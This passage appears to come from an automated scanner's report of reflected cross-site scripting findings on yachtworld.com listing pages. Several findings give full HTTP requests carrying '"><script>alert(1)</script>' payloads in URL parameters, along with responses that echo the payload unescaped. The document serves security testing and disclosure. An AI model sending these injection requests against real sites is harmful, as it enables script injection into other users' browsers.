25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:00 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756&boat_id=1930392">
...[SNIP]...

3.92. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848cf"><script>alert(1)</script>c7c6ac147ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States?848cf"><script>alert(1)</script>c7c6ac147ce=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:03 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:03 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&848cf"><script>alert(1)</script>c7c6ac147ce=1&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.93. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234c4"><script>alert(1)</script>97cd139ab78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:50 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States&boat_id=2305173">
...[SNIP]...

3.94. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a142d"><script>alert(1)</script>12c59d7a8be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FU